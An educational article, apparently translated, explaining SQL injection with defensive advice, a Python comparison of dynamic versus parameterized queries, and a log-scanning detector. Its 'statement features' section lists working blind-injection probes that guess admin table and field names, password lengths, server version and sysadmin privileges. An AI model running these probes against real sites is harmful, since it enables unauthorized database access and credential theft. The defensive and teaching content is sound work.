[SQL injection principle]

The so-called SQL injection tricks the server into executing malicious SQL commands by inserting SQL into web form fields, the query string of a URL, or the parameters of a page request. Specifically, it abuses an existing application to inject (malicious) SQL commands into what the backend database engine executes: by entering (malicious) SQL statements in a web form, an attacker can exploit a security vulnerability to make the website's database run SQL other than what the designer intended. For example, many earlier video sites leaked VIP member passwords largely because they submitted query strings through web forms, which made them particularly vulnerable to SQL injection attacks.

Principle

A SQL injection attack constructs specially crafted input and passes it to the web application as a parameter. Most such inputs are combinations of SQL syntax, and when the resulting SQL statement is executed it carries out the operation the attacker wants. The root cause is that the program does not filter user-supplied data carefully enough, so illegal data gets into the system.

By underlying technical principle, SQL injection can be divided into platform-layer injection and code-layer injection. The former is caused by an insecure database configuration or a vulnerability in the database platform; the latter is mainly caused by programmers not filtering input carefully, so that illegal data is executed as part of a query. Accordingly, the causes of SQL injection usually show up in the following areas: ① improper type handling; ② unsafe database configuration; ③ unreasonable handling of result sets; ④ improper error handling; ⑤ improper handling of escape characters; ⑥ improper handling of multiple submissions.

Attack

SQL injection attacks occur when an application uses input to construct dynamic SQL statements that access the database. They can also occur when the code calls stored procedures and passes them strings that contain unfiltered user input. SQL injection lets an attacker execute commands in the database under the application's own login. The testing tool pangolin can be used to check for such injection. The problem is made worse if the application connects to the database with an over-privileged account. In some forms, the content the user enters is used directly to build dynamic SQL commands or is passed as an input parameter to a stored procedure; these forms are particularly vulnerable. Because many website programs are written without checking the legitimacy of user input, or handle variables improperly, the application carries a latent security risk: a user can submit a fragment of database query code and, from the results the program returns, obtain sensitive information or even take control of the entire server. That is how SQL injection occurs.

Protection

To sum up, the main points are as follows:

1. Never trust user input. Validate it with regular expressions or limit its length, and convert single quotes and double "-" (that is, "--"), etc.

2. Never use dynamically assembled SQL; use parameterized SQL, or use stored procedures directly for data queries and access.

3. Never use database connections with administrator privileges; give each application its own database connection with limited privileges.

4. Do not store confidential information in the clear; encrypt or hash passwords and other sensitive information.

5. The application's exception messages should give as few hints as possible; it is best to wrap the original error message in a custom error message.

6. SQL injection is generally detected with auxiliary software or a website security platform. The usual software is the SQL injection detection tool jsky; website platforms include the Yisi website security platform's detection tool, MDCSOFT SCAN, and others. Using MDCSOFT-IPS can effectively defend against SQL injection, XSS attacks, etc.
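What points 1, 2 and 5 change in practice, as an added Python example (this is not code from the original article): the first lookup pastes the id parameter into the statement text, so two inputs that differ only in an always-true versus always-false condition produce two different answers, which is exactly the injection-point test described in the next section; the second lookup allow-lists the parameter's shape, binds it as a parameter, and returns one fixed error, so the two inputs are indistinguishable from outside. The table, its rows, the placeholder password hashes and the probe helper are constructed for illustration.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's database (sample schema and rows, not from the article)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO admin (name, password) VALUES (?, ?)",
        [("editor", "<password-hash placeholder>"), ("ops", "<password-hash placeholder>")],
    )
    return conn


def admin_exists_dynamic(conn, raw_id):
    """Violates point 2: the request parameter becomes part of the statement text."""
    sql = "SELECT count(*) FROM admin WHERE id = " + raw_id
    return conn.execute(sql).fetchone()[0] > 0


class LookupFailed(Exception):
    """Point 5: one fixed message reaches the client; the real database error stays in the server log."""


# Point 1: allow-list the exact shape the parameter may have (an id is 1 to 10 digits here).
ID_RE = re.compile(r"[0-9]{1,10}")


def admin_exists_safe(conn, raw_id):
    if not ID_RE.fullmatch(raw_id):
        raise LookupFailed("invalid request")
    try:
        # Point 2: the value travels as a bound parameter, never as statement text.
        row = conn.execute("SELECT count(*) FROM admin WHERE id = ?", (int(raw_id),)).fetchone()
    except sqlite3.Error:
        # Log the original exception server-side here; do not echo it back to the client.
        raise LookupFailed("invalid request") from None
    return row[0] > 0


def probe(func, conn, inputs):
    """What an outside observer learns from each input: True, False, or 'error'."""
    seen = {}
    for raw in inputs:
        try:
            seen[raw] = func(conn, raw)
        except (LookupFailed, sqlite3.Error):
            seen[raw] = "error"
    return seen


# The last two inputs differ only in a condition that is always true vs. always false.
INPUTS = ["1", "1 and 1=1", "1 and 1=2"]

if __name__ == "__main__":
    db = make_db()
    print("dynamic:", probe(admin_exists_dynamic, db, INPUTS))  # True / True / False: an oracle
    print("safe:   ", probe(admin_exists_safe, db, INPUTS))     # True / error / error: no oracle
```

The dynamic version answers True, True, False for the three inputs, so the page's behaviour reveals whether injected conditions are evaluated; the hardened version answers True, error, error, and the error text is the same fixed string in both failing cases, so neither the validation failure nor any database error leaks detail. Binding the parameter is what removes the vulnerability; the allow-list and the generic error are defence in depth for points 1 and 5.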

 

 

Statement features

1. Determine whether there is an injection point

; and 1=1 and 1=2

2. Guess the table name; common names are nothing more than admin, adminuser, user, pass, password, etc.

and 0<>(select count(*) from *)

and 0<>(select count(*) from admin) --- determines whether a table named admin exists

3. Guess the number of accounts: if 0< returns the correct page and 1< returns the error page, the number of accounts is 1

and 0<(select count(*) from admin)

and 1<(select count(*) from admin)

4. Guess the field name: put the field name you suspect inside the len( ) brackets.

and 1=(select count(*) from admin where len(*)>0)--

and 1=(select count(*) from admin where len(user field name)>0)

and 1=(select count(*) from admin where len(password field name password)>0)

5. Guess the length of each field: change the number after > until the correct page is returned

and 1=(select count(*) from admin where len(*)>0)

and 1=(select count(*) from admin where len(name)>6) error

and 1=(select count(*) from admin where len(name)>5) correct, so the length is 6

and 1=(select count(*) from admin where len(name)=6) correct

and 1=(select count(*) from admin where len(password)>11) correct

and 1=(select count(*) from admin where len(password)>12) error, so the length is 12

and 1=(select count(*) from admin where len(password)=12) correct

6. Check which patch the server has: an error here means the SP4 patch has been applied

and 1=(select @@VERSION)--

7. Check the privileges of the database connection account: a normal return proves it holds the sysadmin server role.

and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--

8. Determine the account used to connect to the database. (If the check for the SA account returns normally, the connection account is SA.)

and sa=(SELECT System_user)--

and user_name()=dbo--

and 0<>(select user_name()--
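Point 6 of the protection list leaves detection to tools; the statement features just listed are the strings such a tool looks for in request logs. The following Python is an added example, not from the article or any of the products it names: a signature scan over constructed web access-log lines (RFC 5737 test addresses, made-up paths), with URL-decoding before matching and a per-client count so that a sequence of probes stands out from a single odd request. The signature names, the log format assumed and the threshold are my own choices.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe statements listed in the section above. Matching is case-insensitive
# and runs on the URL-decoded request target. The names are labels chosen here, not product terms.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "count_probe": re.compile(r"select\s+count\s*\(\s*\*\s*\)\s+from", re.I),
    "len_probe": re.compile(r"\blen\s*\(", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "role_probe": re.compile(r"is_srvrolemember\s*\(", re.I),
    "user_probe": re.compile(r"\b(system_user|user_name\s*\()", re.I),
}

# Apache/Nginx "combined"-style access line: client ip, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_line(line):
    """Return a record for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice so a double-encoded payload (%2520 -> %20 -> space) is seen in the clear.
    decoded = unquote_plus(unquote_plus(m.group("target")))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return {"ip": m.group("ip"), "target": m.group("target"), "status": m.group("status"), "hits": hits}


def scan_log(lines):
    """Records for every line that matched at least one signature."""
    return [rec for rec in map(scan_line, lines) if rec and rec["hits"]]


def suspicious_ips(records, threshold=3):
    """Clients with at least `threshold` flagged requests: a guessing sequence rather than a one-off."""
    counts = {}
    for rec in records:
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


# Constructed sample log: one ordinary visitor and one client walking through the probes above.
SAMPLE_LOG = [
    '203.0.113.9 - - [12/Mar/2024:10:14:58 +0000] "GET /search.asp?q=hello%20world HTTP/1.1" 200 2210',
    '198.51.100.7 - - [12/Mar/2024:10:15:01 +0000] "GET /article.asp?id=326 HTTP/1.1" 200 4821',
    '198.51.100.7 - - [12/Mar/2024:10:15:03 +0000] "GET /article.asp?id=326%20and%201=1 HTTP/1.1" 200 4821',
    '198.51.100.7 - - [12/Mar/2024:10:15:04 +0000] "GET /article.asp?id=326%20and%201=2 HTTP/1.1" 200 311',
    '198.51.100.7 - - [12/Mar/2024:10:15:09 +0000] "GET /article.asp?id=326%20and%200%3C%3E(select%20count(*)%20from%20admin)-- HTTP/1.1" 200 4821',
    '198.51.100.7 - - [12/Mar/2024:10:15:15 +0000] "GET /article.asp?id=326%20and%201=(select%20@@VERSION)-- HTTP/1.1" 500 611',
    '198.51.100.7 - - [12/Mar/2024:10:15:21 +0000] "GET /article.asp?id=326%20and%201=(SELECT%20IS_SRVROLEMEMBER(sysadmin))-- HTTP/1.1" 200 4821',
]

if __name__ == "__main__":
    flagged = scan_log(SAMPLE_LOG)
    for rec in flagged:
        print(rec["ip"], rec["status"], rec["hits"], rec["target"])
    print("suspicious:", suspicious_ips(flagged))
```

Two things to read off the sample: the response sizes of the 1=1 and 1=2 requests differ (4821 vs 311 bytes), which is the page-difference oracle the guessing steps rely on, and the probes arrive seconds apart from one address, which is why a per-client count is more useful than judging each line alone. The signatures only catch the verbatim forms listed on this page; other encodings, comments inserted into keywords, and POST bodies (which never reach an access log) are missed, and the len( ) signature can fire on harmless parameters, so treat this as a first-pass indicator alongside points 1 and 2 rather than a substitute for them.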


Origin http://43.154.161.224:23101/article/api/json?id=326033046&siteId=291194637